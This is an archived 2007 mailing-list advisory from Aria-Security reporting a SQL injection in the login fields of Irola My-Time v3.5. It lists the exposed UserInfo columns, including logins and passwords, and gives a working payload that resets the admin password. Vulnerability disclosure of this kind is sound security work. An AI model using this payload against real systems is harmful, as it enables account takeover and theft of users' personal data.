Aria-Security.net: Irola My-Time v3.5 SQL Injection Nov 23 2007 09:53AM
no-reply Aria-Security net
Aria-Security Team

http://Aria-Security.Net

-----------------------------

Original Advisory (and more details) @ http://aria-security.net/forum/showthread.php?p=1106

Irola My-Time v3.5

http://www.irola.com

Username/Password Fields can run SQL Queries. Therefore:

We get the Tables:

UserInfo.UserID

UserInfo.Login

UserInfo.Password

UserInfo.UserNumber

UserInfo.FirstName

UserInfo.LastName

UserInfo.TeamID

UserInfo.Address

UserInfo.City

UserInfo.ZipCode

UserInfo.CountryID

UserInfo.Phone

Useful Injection: (changes admin's passwsord to hacked)

-1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');--

MORE HELP AT the Original Page.

Greetz: AurA

Credits goes to Aria-Security Team

Regards,

The-0utl4w

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus